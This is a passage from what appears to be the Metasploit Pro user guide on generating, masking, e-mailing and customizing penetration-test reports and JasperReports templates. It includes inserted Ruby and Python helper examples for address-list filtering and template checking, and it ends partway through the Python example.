Output formats: PDF, HTML, Word, RTF
Report options:
- Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name with a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Project Summary, Executive Summary, Compromised Summary, Compromised Hosts, and Vulnerabilities and Exploits
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

FISMA Compliance Report

Description: Reports on FISMA compliance criteria.
Output formats: PDF, HTML, Word, RTF
Report options:
- Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name with a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Executive Summary, Detailed Findings
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

PCI Compliance Report

Description: Reports on PCI compliance criteria.
Output formats: PDF, HTML, Word, RTF
Report options:
- Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name with a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Executive Summary, Requirements Status Summary, Host Status Summary, Detailed Findings
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Services Report

Description: Reports on all network services that were scanned or imported.
Output formats: PDF, HTML, Word, RTF
Report options:
- Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name with a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Project Summary, Executive Summary, Network Service Summary, Network Services Table
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Social Engineering Report

Description: Provides comprehensive results and data for a particular campaign.
Output formats: PDF, HTML, Word, RTF
Report options:
- Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name with a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Cover Page, Executive Summary, Social Engineering Funnel, Exploits Used, Form Submissions, Browser/Platform Information, Appendices: Hosts Details, Human Targets, Appendix: Campaign Components (Web page/e-mail HTML content), and Appendix: Remediation Advice
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Web Application Assessment Report

Description: Enumerates all web sites and their vulnerabilities, forms, and pages.
Output formats: PDF, HTML, RTF (this report cannot be generated as a Word file)
Report options:
- Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name with a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Cover Page, Executive Summary, Engagement Scope, OWASP Status, Summary Graphs, Vulnerability Details, and Appendices
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports


A report clearly presents project data in a distributable and tangible output format. It organizes your findings into relevant sections, displays charts and graphs for statistical data, and summarizes major findings. This is extremely useful when you need to share information with people who do not have access to Metasploit Pro or who want to quickly process your test results. All tasks related to reports, such as generating, downloading, e-mailing, and deleting them, can be performed from the Reports area of the web interface.

Notification Center Statuses for Reports


When you generate a report, the Notification Center alerts you when a report has started generating, finished generating, or encountered an error during generation. The Notification Center appears as an icon in the upper-right corner of the global toolbar and displays the total number of unread notifications. You can click on the Notification Center icon to display a list of alerts.

The Notification Center displays the following statuses for reports:

- Report started - This status indicates that the report has started generating.
- Report finished - This status indicates that the report was generated without errors and is ready for you to view and download. You can click on the alert to open the report. When you open the report from the Notification Center, it displays a unified view of the report and shows the formats that are available for it. You can click on any of the format icons to view the report in the selected format.
- Problem with report - This status indicates that there was an issue with the report and it was not able to finish. You will need to view the report log to troubleshoot the issue. For more information on report logs, see Report Logs on page 434.

Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports

443

Generating a Standard Report

1. Open the project that contains the data you want to use to create a report.
2. Select Reports > Create Standard Report from the Project tab bar. The Reports page appears with the Generate Standard Report tab selected.
3. Click the Report type dropdown and choose the report you want to generate. For more information on the report types that are available, see Metasploit Report Types on page 438.
4. Choose the file formats you want to generate for the report. You can generate multiple formats for a report at the same time. Most reports can be generated as PDF, Word, RTF, or HTML documents; however, the Web Application Assessment Report cannot be generated as a Word file.
5. Enter a name for the report in the Report Name field. (Optional) If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, an Audit Report will be named Audit-20140106140552.
6. Use the Included addresses field to explicitly define the hosts you want to include in the report. (Optional) Only the hosts you list in this field appear in the report; all other hosts are left out.
7. Use the Excluded addresses field to explicitly define the hosts you want to exclude from the report. (Optional) The hosts you list in this field are left out of the report; all other hosts are included.
8. Click the Campaign dropdown and select the campaign you want to use to create a report. (Social engineering reports only) The report form only displays the campaigns that are stored in the project.
9. Click the Cover Logo dropdown and select the logo that you want to use on the cover page of the report. If you have not uploaded a logo to the project, you must first upload the logo that you want to use to the Custom Report Collateral area of the project. For more information on uploading a logo, see Adding a Custom Logo to a Report on page 457.
10. Select the report sections that you want to include in the report. The report sections that are available will vary between reports. For more information on the sections available for each report, see Understanding Report Types on page 438.
11. Enable or disable any report options to manage the data that appears in the report. The report form displays the options that are applicable for the report type that you have selected. The following report options may be available:
   - Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name and a blank password.
   - Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
   - Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report.
   - Include web page HTML (in addition to image preview) - Includes the original page code as raw text as well as the rendered preview image. (Social Engineering Campaign Details Report only)
12. Enter the e-mail addresses you want to send the report to after the report generation. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
13. Generate the report. When the report generation begins, the web interface redirects you to the View Reports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports > Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.

Generating Additional Formats for a Report

1. Open the project that contains the report for which you want to generate additional formats.
2. Select Show Reports from the Project tab bar. The Show Reports page appears.
3. Find the row that contains the report for which you want to generate additional formats. The row shows the metadata and the file formats that are available for the report.
4. Click on the report name to open it. The unified report view will open and display a preview of the report. The formats that are available for the report will be displayed in the sidebar. Formats that have a colored icon and checkbox have already been generated. Formats that are grayed out have not been generated.
5. Click on the file format that you want to generate for the report. You can only generate one format at a time.

When the report generation begins, the format button will be replaced with a progress indicator. The format button will reappear when the report is ready for you to view or download.

At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the latest notification message or you can select Reports > Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.

Generating MetaModule Reports

A MetaModule provides a guided interface to walk you through a single penetration testing task. Each MetaModule leverages the core functionality of a module, such as password testing, but enables you to quickly configure and run the module with minimal set up. Each MetaModule includes a specialized report, which contains data that is specific to the MetaModule run. MetaModule reports are configured from within the MetaModule and are generated when the MetaModule runs. After the MetaModule generates the report, you can view the report from the Reports area. For more information on MetaModule reports, see MetaModule Reports on page 290.

Generating a Custom Report

A custom report is created using a user-uploaded Jasper report template. The template defines the layout of the report and the sections that the report contains. You can create a report template from scratch using a tool like iReport. For more information on custom templates, see Working with Custom Templates on page 461. Before you can generate a custom report, you must upload the template that you want to use to the Custom Report Collateral area of the project. If the project does not contain any custom report templates, the New Custom Report form will not load. Instead, the form displays a warning that the project does not contain any templates. You must upload a valid JRXML template to continue. For more information on uploading a custom template, see Uploading Templates on page 466.

To generate a custom report:

1. Open the project that contains the data you want to use to create a report.
2. Select Reports > Create Custom Report from the Project tab bar. The New Custom Report page appears.
3. Select the template you want to use to create the report.
4. Choose the file formats you want to generate for the report. You can select multiple formats. All formats will be generated for the report at the same time.
5. Enter a name for the report in the Report Name field. (Optional) If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, a custom report will be named Custom-20140106140552.
6. Use the Included addresses field to explicitly define the hosts you want to include in the report. (Optional) Only the hosts you list in this field appear in the report; all other hosts are left out.
7. Use the Excluded addresses field to explicitly define the hosts you want to exclude from the report. (Optional) The hosts you list in this field are left out of the report; all other hosts are included.
8. Click the Cover Logo dropdown menu and select the logo you want to display on the cover page of the report. (Optional) If you do not select a logo, the report will use the default Rapid7 logo.
9. Enter the e-mail addresses you want to send the report to after the report generates. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
10. Generate the report. When the report generation begins, the web interface redirects you to the View Reports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports > Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.

Downloading a Report

1. Open the project that contains the report you want to download.
2. Select Reports > Show Reports from the Project tab bar. The Reports page appears.
3. Find the row that contains the report you want to download. The row displays the metadata and the file formats that have been generated for the report.
4. Click on the report name to open it. The unified report view will open and display a preview of the report.
5. Select the formats you want to download. The formats that are available for the report will have an active checkbox located next to them.
6. Click the Download button located under the Report Actions area. The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the report to your computer.

Viewing a Report

1. Open the project that contains the report you want to view.
2. Select Reports > Show Reports from the Project tab bar. The Reports page appears.
3. Find the row that contains the report you want to view. The row displays the metadata and the file formats that have been generated for the report.
4. Click on the format that you want to view the report in. The report will open in your browser.

E-mailing a Report

You can quickly share reports by e-mailing them as soon as they are generated. Both the standard and custom report generation forms have an Email Report field that enables you to define a list of e-mail recipients.

As long as you have a valid mail server configured for your Metasploit Pro instance, the report will automatically be sent to the addresses you have listed. Keep in mind that a report can contain the plain text passwords, hashes, and SSH keys discovered during the test unless the Mask discovered credentials option is enabled, so check the masking option before sending a report over e-mail.

Setting Up a Mail Server


In order to utilize e-mail capabilities, you must have access to a local mail server or a web mail server. You need the address and port that the mail server runs on, the domain name that hosts the mail service, and the credentials for the mail server. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.

Cloning a Report Configuration

You can clone a report to make a copy of an existing report's configuration. Report cloning enables you to reuse and rerun a previously generated report. You can modify the configuration or run it as it is.

To clone a report:

1. Open the project that contains the report you want to clone.
2. Select Reports > Show Reports from the Project tab bar. The Reports page appears.
3. Find the row that contains the report that you want to clone.
4. Click the Clone link located under the Actions column. The New Report form appears. The form retains the configuration settings that you used to generate the original report.

Deleting Reports

When you delete a report, it will be permanently removed from the Reports directory, and you will no longer be able to view it from the Reports area of the web interface. Please make sure that you have the data that you need from the report before you delete it.

To delete a report:

1. Open the project that contains the report you want to delete.
2. Select Reports > Show Reports from the Project tab bar. The Reports page appears.
3. Select the report or reports that you want to delete.
4. Click the Delete button located in the Quick Tasks bar. The browser will ask you to confirm that you want to delete the report.
5. Select OK to delete the report.

Deleting Reports

453

Customizing Standard Reports


A standard report is based on a Metasploit report template, which controls the look and feel of the report. All reports have a cover page and include a set of options that enable you to manage the report data. You can customize some parts of a standard report, such as the logo and sections of content that appear in the report. If you want to modify the layout of the report, you will need to use a custom template. For more information on custom templates, see Working with Custom Templates on page 461.

Excluding Report Sections


A report is made up of multiple sections. Each section divides the report content into distinct areas of information. When you view the New Report form, you will see the sections that are available for the report you have selected. By default, all sections will be selected. If you want the report to only show certain sections of a report, you can exclude sections from the report.

To exclude specific sections, you can deselect the sections you do not want to appear in the report. When you generate the report, you will not see the excluded sections in the report. Additionally, the report will only show content for the sections for which it has data. For more information on report sections, see Metasploit Report Types on page 438.

Excluding and Including Hosts from Reports

When you generate a report, Metasploit Pro automatically includes data from all hosts in the project. If you want to limit the data to a particular set of hosts, you can create an inclusion or exclusion list.

Creating Inclusion Lists

An inclusion list defines the hosts that you want to include in a report. Only the data for the hosts that you have explicitly defined will be displayed in the report. You create an inclusion list from the New Report form. Use the Included addresses field to define the specific hosts you want to include in the report. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.

Creating Exclusion Lists

An exclusion list defines the hosts that you do not want to include in a report. The report will include data for all of the hosts in the project, except for the ones that you have defined in the exclusion list. You create an exclusion list from the report generation form. Use the Excluded addresses field to define the specific hosts you want to exclude from the report. You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry.
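The following Ruby script is an added example for the two list types above; it is not Metasploit Pro's own filtering code. It parses a newline-separated list of single addresses, ranges and CIDR blocks, as the page describes, and applies both lists to a constructed host list. The page does not define the range syntax, so the two range forms accepted here (a full "first-last" pair and a short "10.0.0.10-30" last-octet form) are assumptions, as is the rule that a host must match the inclusion list (when one is given) and must not match the exclusion list. Only Ruby's standard IPAddr library is used.

```ruby
require 'ipaddr'

# Parse one entry of an Included/Excluded addresses list into an inclusive
# [first, last] pair of integer addresses. Accepted forms (range syntax assumed):
#   10.0.0.5               single address
#   10.0.0.0/24            CIDR block (host bits are masked off, so 10.0.0.5/24 == 10.0.0.0/24)
#   10.0.0.10-10.0.0.30    full range
#   10.0.0.10-30           short IPv4 range, last octet only
# Malformed addresses raise IPAddr::InvalidAddressError (an ArgumentError).
def parse_entry(entry)
  entry = entry.strip
  if entry.include?('/')
    range = IPAddr.new(entry).to_range
    [range.first.to_i, range.last.to_i]
  elsif entry.include?('-')
    lo, hi = entry.split('-', 2).map(&:strip)
    lo_ip = IPAddr.new(lo)
    hi = lo.sub(/\d+\z/, hi) if lo_ip.ipv4? && !hi.include?('.')
    hi_ip = IPAddr.new(hi)
    raise ArgumentError, "mixed address families: #{entry}" if lo_ip.family != hi_ip.family
    raise ArgumentError, "reversed range: #{entry}" if hi_ip.to_i < lo_ip.to_i
    [lo_ip.to_i, hi_ip.to_i]
  else
    ip = IPAddr.new(entry)
    [ip.to_i, ip.to_i]
  end
end

# One entry per line, as the New Report form expects; blank lines are ignored.
def parse_address_list(text)
  text.to_s.each_line.map(&:strip).reject(&:empty?).map { |line| parse_entry(line) }
end

def in_list?(ranges, host)
  n = IPAddr.new(host).to_i
  ranges.any? { |lo, hi| n.between?(lo, hi) }
end

# An empty inclusion list means "all hosts in the project"; a host that matches
# the exclusion list is always dropped (assumed combination of the two lists).
def select_report_hosts(hosts, included: '', excluded: '')
  inc = parse_address_list(included)
  exc = parse_address_list(excluded)
  hosts.select { |h| (inc.empty? || in_list?(inc, h)) && !in_list?(exc, h) }
end

# Constructed sample project hosts for this example (not real data).
PROJECT_HOSTS = %w[10.0.0.5 10.0.0.20 10.0.1.7 172.16.0.3 192.168.1.10].freeze

if __FILE__ == $PROGRAM_NAME
  kept = select_report_hosts(PROJECT_HOSTS,
                             included: "10.0.0.0/24\n192.168.1.10",
                             excluded: "10.0.0.10-30")
  puts "hosts in report: #{kept.join(', ')}"
end
```

Run with the sample lists, 10.0.0.20 is included by the /24 block but removed again by the 10.0.0.10-30 exclusion, which is the behaviour to expect when both fields are filled in on the form.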

Masking Credentials from Reports


You can mask credentials if you do not want to include the plain text passwords and hashes in the Audit, Authentication Tokens, FISMA, and PCI reports.


To mask credentials from a report, you need to select the credential masking option on the New Report form. Select the Mask discovered credentials option to enable credential masking in your report.

When the masking option is enabled, the reports will not display plaintext credentials. For example, when you view the generated Audit report, the Compromised Credentials section only shows the host addresses, services, and user names that were discovered. The password, hash, and key fields are blank.

Other reports, such as the PCI and FISMA reports, replace all credentials with <blank>.

Removing Charts from Reports


Charts visually present numerical data. They are effective when you use them to present and compare large sets of information. You can include them in a report to simplify quantitative data and to highlight trends in your findings. Metasploit Pro reports mostly use pie charts to illustrate how data is distributed across different categories. Most reports, with the exception of the FISMA, PCI, Social Engineering, Web Application Assessment, and Activity reports, have the option to include charts. By default, this option is enabled, so charts will be automatically generated for applicable reports. If you do not want to include charts in your report, you can disable the charts and graphs option. To exclude charts and graphs from a report, deselect the Include charts and graphs option.

Including Web Page HTML in Social Engineering Reports


The Social Engineering Report presents the findings and data for a particular campaign. It contains the details for the campaign components that you used to build the campaign, such as the target list, e-mail, and web pages used. The raw content for the target list and e-mail will automatically be included in the report. If you want to include the raw content for the web pages, you will need to enable the Include web page HTML option. If enabled, this option includes the HTML for each web page used in the campaign. A preview of the web page will render in the report if the web page was used as part of a campaign.

Note: If the web page delivered malicious code, such as a client-side exploit, Java applet, or executable file, a preview will not be rendered for the web page.

If you want to include the raw HTML that was used to create a web page and a preview of the web page, you can select the Include web page HTML option on the New Report form.

Customizing Report Names


Metasploit Pro uses the following naming convention for report names: <report type>-<timestamp>, where the timestamp is the generation time written as YYYYMMDDHHMMSS (for example, Audit-20140106140552). The report name appears in the Reports list. You can change the name by replacing the default name in the Report Name field on the New Report form.

Adding a Custom Logo to a Report


All reports include a cover page that displays the title, logo, and timestamp. The cover page displays the Rapid7 image as the default logo on all reports. If you want to replace the default logo, you can upload a JPG, GIF, or PNG file. The uploaded logo can be used to brand a report with your organization's identity. The logo appears in the right side of the cover page and replaces the default Rapid7 logo.


Logo Requirements
The logo area on the cover page is 320 x 320 pixels. You can upload an image that is larger than the logo area, but the logo will be resized to fit the cover page.

If the image is larger than the logo area, the height of the image will be preserved, but the width will be resized.


Uploading a Custom Logo


1. Open the project that you want to upload the logo to.
2. Select Reports > Create Custom Report from the Project tab bar. The Reports page appears.
3. Find the Custom Report Collateral area.
4. Click the Upload Custom Report Collateral button. The Upload window appears.
5. Click the Choose File button. The Open dialog window appears.
6. Browse to the location of the logo file. Note: You can upload a GIF, JPEG, JPG, or PNG file.
7. Select the logo file and click the Open button.
8. Enter a name for the file in the Descriptive Name field. (Optional) If you do not specify a name, the Custom Report Collateral area shows the original file name.
9. Click the Upload button. The file appears under the Custom Report Collateral area.

Adding a Custom Logo to a Standard Report


To use a custom logo on the report's cover page, you need to click the Custom report logo dropdown on the New Report form and select the image you want to use. The dropdown will show the logos that have been uploaded to the project.

If the project does not contain any logos, the New Report form will display a link to the Custom Reports page where you can upload your logo.


Working with Custom Templates


Metasploit Pro ships with a set of predefined standard reports, which are created with Metasploit templates and designed to meet basic pentesting reporting requirements. However, if the standard reports do not provide you with the content or layout that you need, you can use a custom template to build your report. A custom template enables you to do things like apply corporate styles to your reports, control how and where content is displayed in your reports, and customize your reports for regional compliance needs. A custom template is a JRXML file, which is an XML document with a JasperReport file extension. It contains the report structure, which defines where the report displays content, where it places images, and how it queries data. It can be built by directly manipulating XML or more easily by using a visual report tool for JasperReports, such as iReport Designer or the Eclipse-based Jaspersoft Studio.

Jasper Reports and iReport Designer


Metasploit Pro uses JasperReports 5.0, which is an open source Java-based reporting library, to compile JRXML templates and generate reports in output formats such as PDF, RTF, HTML, and Word. The JRXML template is a standards-based XML file that defines the elements and attributes that control where content is placed in a report. You can build the JRXML template with a visual report designer called iReport Designer, which is an open source tool maintained by Jaspersoft. iReport Designer provides a graphical user interface that enables you to visually design your report templates without extensive knowledge of the JasperReports library, XML, and Java. You can drag and drop report elements to create the layout of the report, and you can connect it to a data source, like JDBC and XML, to query data for the report. The resulting JRXML template can be imported into a Metasploit Pro project and used to create a custom report.
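The following Ruby script is an added example, not part of this guide or of the Metasploit Pro code base. It shows the three JRXML elements that matter most when Metasploit Pro compiles a template (a queryString, the parameter declarations the query references, and the field declarations the band expressions reference) and checks a template for the mismatches that most often produce a "Problem with report" notification: a $P{} used in the query or a $F{} used in an expression that was never declared. The embedded template is a constructed sample, not the shipped msfxv3.jrxml; its query assumes a hosts table with address, name, os_name and workspace_id columns and casts the PostgreSQL inet column to text so JDBC returns a string. The os_name field is deliberately left undeclared so the check has something to find. Only Ruby's bundled REXML parser is used.

```ruby
require 'rexml/document'

# Constructed sample JRXML template (assumed schema: hosts(address, name,
# os_name, workspace_id)). $F{os_name} is used but not declared on purpose.
SAMPLE_JRXML = <<~'XML'
  <?xml version="1.0" encoding="UTF-8"?>
  <jasperReport xmlns="http://jasperreports.sourceforge.net/jasperreports"
                name="host_inventory" pageWidth="595" pageHeight="842"
                columnWidth="555" leftMargin="20" rightMargin="20"
                topMargin="20" bottomMargin="20">
    <parameter name="workspace_id" class="java.lang.Integer"/>
    <queryString><![CDATA[
      SELECT address::text AS address, name, os_name
      FROM hosts
      WHERE workspace_id = $P{workspace_id}
      ORDER BY address
    ]]></queryString>
    <field name="address" class="java.lang.String"/>
    <field name="name" class="java.lang.String"/>
    <detail>
      <band height="20">
        <textField>
          <reportElement x="0" y="0" width="150" height="20"/>
          <textFieldExpression><![CDATA[$F{address}]]></textFieldExpression>
        </textField>
        <textField>
          <reportElement x="160" y="0" width="200" height="20"/>
          <textFieldExpression><![CDATA[$F{os_name}]]></textFieldExpression>
        </textField>
      </band>
    </detail>
  </jasperReport>
XML

# The same template with the missing field declaration added.
FIXED_JRXML = SAMPLE_JRXML.sub('<field name="name"',
                               "<field name=\"os_name\" class=\"java.lang.String\"/>\n  <field name=\"name\"")

# Return the problems found in a JRXML string; an empty array means the checks passed.
def check_template(jrxml)
  root = REXML::Document.new(jrxml).root
  unless root && root.name == 'jasperReport'
    return ["root element is #{root ? root.name : 'missing'}, expected jasperReport"]
  end

  # Match direct children by local name so the default namespace does not get in the way.
  direct  = ->(local) { root.elements.select { |e| e.name == local } }
  text_of = ->(e) { e.texts.map(&:value).join }   # CDATA sections are Text nodes too

  declared_params = direct.call('parameter').map { |e| e.attributes['name'] }
  declared_fields = direct.call('field').map { |e| e.attributes['name'] }
  query = direct.call('queryString').map(&text_of).join

  problems = []
  problems << 'no queryString: the report will have no rows' if query.strip.empty?

  (query.scan(/\$P\{(\w+)\}/).flatten.uniq - declared_params).each do |p|
    problems << "query uses undeclared parameter $P{#{p}}"
  end

  expressions = []
  root.each_recursive { |e| expressions << text_of.call(e) if e.name == 'textFieldExpression' }
  (expressions.join(' ').scan(/\$F\{(\w+)\}/).flatten.uniq - declared_fields).each do |f|
    problems << "expression uses undeclared field $F{#{f}}"
  end
  problems
end

if __FILE__ == $PROGRAM_NAME
  puts "sample: #{check_template(SAMPLE_JRXML).inspect}"
  puts "fixed:  #{check_template(FIXED_JRXML).inspect}"
end
```

Running the check before uploading a template catches the declaration mismatches at your desk rather than in the report log; it does not validate the SQL itself, which still has to be tested against the Metasploit database from iReport Designer.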

Downloading Jasper iReport


To download Jasper iReport, please visit the following site: http://jasperforge.org/projects/ireport.

Resources for JasperReports and iReport Designer


In order to build a custom template, you must be familiar with JasperReports and iReport Designer. There are quite a few resources available that will help you learn how to build report templates with iReport Designer and understand how JasperReports works. To learn more about JasperReports or iReport Designer, visit the following resources:
- JasperReports documentation list - A list of the documentation that is available for JasperStudio, JasperReports Server, JasperReports Library, and iReport Designer. You can access this list at the following URL: http://community.jaspersoft.com/documentation.
- JasperReports Library materials reference - A list of the documentation, webinars, and articles that may be helpful for working with JasperReports. You can access this list at the following URL: http://community.jaspersoft.com/wiki/jasperreports-library-reference-materials.
- iReport Designer tutorials and help wiki - A wiki that lists the tutorials that are available for iReport Designer. You can access this list at the following URL: http://community.jaspersoft.com/wiki/ireport-designer-tutorials-help.
- An article on chart customizations - A useful list of chart customizers for JasperReports, iReport Designer, and JasperReports Server. You can view this article at the following URL: http://mdahlman.wordpress.com/2011/04/17/chart-customizers-2/.
- Groovy documentation - Groovy is a Java-compatible scripting language that you can use in place of Java to define expressions in iReport. To learn more about how Groovy and iReport Designer work together, visit the iReport wiki here: http://community.jaspersoft.com/wiki/ireport-designer-groovy. To learn more about Groovy, you can view their documentation here: http://groovy.codehaus.org/.
- Jaspersoft training - To learn more about Jaspersoft training, you can visit https://www.jaspersoft.com/training-services or https://www.jaspersoft.com/training.

Requirements for Designing Custom Templates


To design a report template, you will need the following:
- Experience with Jasper iReport, JasperReports, XML, and SQL/XPath
- Experience with Java or a Java scripting language, such as Groovy or JavaScript
- A working instance of Jasper iReport
- Access to the Metasploit database

Setting Up the Metasploit Database in iReport Designer


To fill your report with data, you need to set up a data source that points to the Metasploit PostgreSQL server. The connection details for the Metasploit PostgreSQL server are in /path/to/metasploit/apps/pro/config/database.yml. Because this file contains the database password, do not copy it into a template or store it alongside one; enter the password only in the iReport Designer connection dialog. You will need the following information from the database.yml file:
- The database name - The default database name is msf3.
- The PostgreSQL port - The default PostgreSQL port is 7337.
- The user name - The default user name is msf3.
- The password - View the database.yml file for your database password.


To set up a data source in iReport Designer:


1. Open iReport Designer. The Quick Start window appears.

2. Click the Database Connection icon. The Datasource window appears.

3. Select Database JDBC connection from the list of data sources.

4. Click Next. The Database JDBC Connection window appears.

5. Enter a name for the connection in the Name field.

6. Replace the contents of the JDBC URL field with jdbc:postgresql://localhost:7337/msf3. If your database.yml lists a different port or database name, use those values instead. If iReport Designer runs on a different machine from Metasploit Pro, replace localhost with the address of the database server, which must be configured to accept that remote connection.

7. Enter the database user name in the Username field.

8. Enter the database password in the Password field.

9. Test the connection. If the connection is working properly, a window appears and alerts you that the connection was successful. If the connection fails, an exception window appears and alerts you that there is an issue with your database settings; verify that your database settings match the information in the database.yml file.

10. Save the connection if the test was successful. You are now ready to create your report template. For resources on creating report templates, see Resources for JasperReports and iReport Designer on page 461.


Custom Resources Directory


All custom templates and logos are stored in the following directory: /path/to/metasploit/apps/pro/reports/custom_resources. You can go to the custom resources directory to download or view logos and templates; however, you should not make any changes directly within the directory. If you need to modify your logos or templates, make a copy of the directory and make your changes in the new directory. Any changes that you make directly within the custom resources directory can cause disparities between the metadata that displays for the file in the web interface and the file itself. If you need to remove or add custom resources, do it from within the web interface. Do not delete them directly from the custom resources directory.

Uploading Templates
After you have created your custom template, you will need to upload it to the project you want to use to build the custom report. The template will only be available to the project that you have uploaded it to; therefore, if you want to use the template across multiple projects, you will need to import the template into each project. When you view the New Custom Report form, the template will be available in the Report Template dropdown menu.


To upload a template:
1. Open the project you want to use to store the custom template.

2. Select Reports > Create Custom Report from the Project tab bar. The Reports page appears with the Generate Custom Report tab selected.

3. Find the Custom Report Collateral area. If your project does not contain any templates, the New Custom Report page will not show the form.

4. Click the Upload Custom Report Collateral button. The Upload window appears.

5. Click the Choose File button. The Open dialog window appears.

6. Browse to the location of the template file.

7. Select the template and click the Open button. The template must have a JRXML extension.

8. Enter a name for the template in the Descriptive Name field. (Optional) If you do not specify a name, the Custom Report Collateral area shows the original file name.

9. Click the Submit button. The template appears under the Custom Report Collateral area.

You are now ready to generate a custom report. For more information on generating custom reports, see Generating a Custom Report on page 447.


Downloading a Custom Report Template


1. Open the project that contains the custom report template that you want to download.

2. Select Reports > Create Custom Report from the Project tab bar. The Reports page appears with the Generate Custom Report tab selected.

3. Find the Custom Report Collateral area.

4. Find the row that contains the custom report template you want to download. The row displays the metadata and the actions that are available for the custom report template.

5. Click the Download link.

The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the template to your computer.


Deleting a Custom Report Template


1. Open the project that contains the custom report template that you want to delete.

2. Select Reports > Create Custom Report from the Project tab bar. The Reports page appears with the Generate Custom Report tab selected.

3. Find the Custom Report Collateral area.

4. Find the row that contains the custom report template you want to delete. The row displays the metadata and the actions that are available for the custom report template.

5. Click the Delete link.

The browser will prompt you to confirm that you want to delete the custom report template.


Downloading the Example Template


Metasploit Pro provides an example template that you can use as a reference when creating your own templates. The template contains simple examples that show how to query data from a project, such as host IP addresses, host names, operating systems, service counts, and vulnerability counts, and display that information in a table. It also shows how to add a title and a footer to the report.
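As an added example that is not part of the shipped template or of Metasploit Pro's own code, the following Python script shows the kind of query such a template runs: one row per host with its service and vulnerability counts. It runs the query against an in-memory SQLite copy of the three tables instead of the Metasploit PostgreSQL database, so it works offline. The table and column names (hosts.address, hosts.name, hosts.os_name, hosts.workspace_id, services.host_id, vulns.host_id) are assumptions based on the attributes listed later under XML Exports and should be checked against your own database; the rows are constructed sample data.

```python
import sqlite3

# The query as it would appear in a template's <queryString> element. The
# pre-aggregated subqueries and LEFT JOINs keep hosts that have no services or
# no vulnerabilities, and avoid multiplying rows when a host has both.
HOST_SUMMARY_SQL = """
SELECT h.address,
       h.name,
       h.os_name,
       COALESCE(s.service_count, 0) AS service_count,
       COALESCE(v.vuln_count, 0)    AS vuln_count
FROM hosts h
LEFT JOIN (SELECT host_id, COUNT(*) AS service_count
           FROM services GROUP BY host_id) s ON s.host_id = h.id
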